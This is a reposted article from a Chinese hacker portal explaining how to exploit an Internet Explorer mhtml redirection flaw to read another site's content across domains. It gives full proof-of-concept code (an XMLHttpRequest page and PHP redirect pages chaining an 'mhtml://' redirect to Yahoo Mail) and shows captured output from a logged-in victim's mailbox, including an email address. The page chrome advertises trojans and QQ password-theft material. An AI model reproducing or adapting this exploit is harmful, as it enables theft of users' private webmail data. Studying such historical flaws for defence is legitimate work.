设为首页  加入收藏  联系我们 繁體中文  

黑客软件:

  漏洞扫描 | 木马间谍 | 加密解密 | 远程控制 | 破坏攻击 | 杀毒软件 | 防火墙类 | OICQ专区 | 黑客必备 | 常用工具 | 网吧攻击
文章中心:   最新资讯 | 黑客技术 | 电脑基础 | 菜鸟文摘 | 网络安全 | 网络技巧 | QQ技巧 | OQ空间代码 | 免费资源 | 编程世界 | 建站技术
素材源码:   论坛相关 | ASP源码 | CGI 源码 | NET 源码 | PHP 源码 | 酷站素材 | 字体素材 | 图片素材 | 友情发布 | 网页模版 | 建站软件
教程动画:   黑客教程 | 黑客编程 | 网站入侵 | 菜鸟教程 | 入侵教程 | 破解教程 | 电子书籍 | 网页制作 | 高级会员 | 综合教程 | 本站原创


   

  您当前的位置:中华隐士黑客联盟 -> 黑客技术 -> 漏洞利用 -> 文章内容 [站内搜索]  

 
IE mhtml redirection漏洞利用方法
作者:不详  来源:转载  发布时间:2007-3-26 14:06:41  发布人:heigeheapao
这个漏洞主要是信息泄露,参见http://secunia.com/advisories/19738/的具体描述。为了保证客户端安全,xmlhttp是无法跨域获取信息的。但是IE出现安全问题,在服务端通过mhtml重定向漏洞,可以利用xmlhttp跨域获取敏感信息。我测试是我登陆了Yahoo Mail之后,通过漏洞可以成功获取到邮件资料。漏洞报告说影响IE6.0,我使用IE7同样遭到攻击。

下面是主页面,通过xmlhttp请求本域的页面。(这里改成直接访问其他域会出现拒绝访问错误)


<html>

<head>

<script language="JavaScript">

// Start XML HTTP Request Object

var request = InitXMLHttpRequest();

function StartTest()

{

document.getElementById("result").innerHTML = "init ok<br />";

document.getElementById("result").innerHTML += "begain open<br /> ";

// Open/

request.open('GET', 'http://www.icylife.net/valu1.php', true);

document.getElementById("result").innerHTML += "begain send<br /> ";

request.onreadystatechange = WhenDone;

// Make the request

request.send();

}

// Function for Initialising the XMLHttpRequest

function InitXMLHttpRequest()

{

var request;

try

{

request = new XMLHttpRequest();

}

catch (trymicrosoft)

{

try

{

request = new ActiveXObject("Msxml2.XMLHTTP");

}

catch (othermicrosoft)

{

try

{

request = new ActiveXObject("Microsoft.XMLHTTP");

}

catch (failed)

{

request = false;

}

}

}

// Initialised?

if ( !request )

{

alert("Due to limitations of your browser you will not be able to use this page.");

}

else

{

return request;

}

}

function WhenDone( )

{

if ( request.readyState == 4 )

{

document.getElementById("result").innerHTML = request.responseText;

}

}

</script>

</head>

<body>

<b>Start the test:</b><br>

<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now</font></a></div>

<br />

<div id="result"></div>

</body>

</html>



这里是第二个页面,利用mhtml重定向,代码很简单。


<?php

header("Location: mhtml://http://icylife.net/valu2.php");

?>



再就是第三个,重定向到yahoo mail。


<?php

header("Location: http://mail.yahoo.com.cn/");

?>



我登陆了mail之后,攻击结果片段如下:


<html>

<head><META HTTP-EQUIV="content-type" CONTENT="text/html; charset=gb2312">



<title>

Yahoo!电邮 - wustyunshu@yahoo.com.cn</title>

<script type="text/javascript">

<!--

if(typeof top.frames["wmailmain"] != "undefined") window.open("http://mail.yahoo.com", "_top");

// -->

</script>

<noscript>

<META HTTP-EQUIV=Refresh CONTENT="0; URL=/ym/login?nojs=1">

</noscript>
[] [返回上一页] [打 印] [收 藏]
  [相关文章评论]    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
 

  系统安全知识:微软..
赛门铁克炮轰微软 认..
IE7新漏洞可导致用户..
误入泡菜坛子--team..
下载病毒并篡改电脑..
下载病毒并篡改电脑..
IE7有钓鱼漏洞 显示..
Cookie的传递流程及..
微软调查IE 7缺陷 黑..
火狐在中小型企业市..


 
免费获得Q币的最新方法
最新免费在线看的电影网站集绵
不用木马,轻松万能偷盗QQ号码
最新QQ空间4.0全屏版效果图!!
黑客快速入门(强烈推荐)
中华隐士黑客联盟
18岁少女欲6000元卖处女身 救患血..
QQ密码本地破解的原理和方法
倾情推出QQ空间互踩联盟(免费加入..
本站超级酷的Flash (不看会后悔的..
 
当Google模式成为“SafeMod=off”.. 03-27
中国防黑网XSS漏洞安全报告 03-27
最方便让灰鸽子过卡巴文件和主动.. 03-27
关于自动探测SQL Server数据信息.. 03-27
实例解析蠕虫病毒的原理 03-27
国外找的cvirus.c病毒源代码 03-27
法律缺位灰鸽子引发争议 03-27
厦门警方破获29亿韩元网络诈骗案.. 03-27
一种进行"ARP欺骗"的木马入侵计算.. 03-27
黑客:网络“黑金帝国”的缔造者 03-27
 
关于本站 网站帮助 广告合作 下载声明 友情连接 网站地图 访客留言 论坛登录
〖中华隐士黑客联盟〗,Copyright © 2006-2010 WwW.Hack86.Com 闽ICP备:06023304号
站长:小质 QQ:771760,软件发布MAIL:Hack086@21cn.com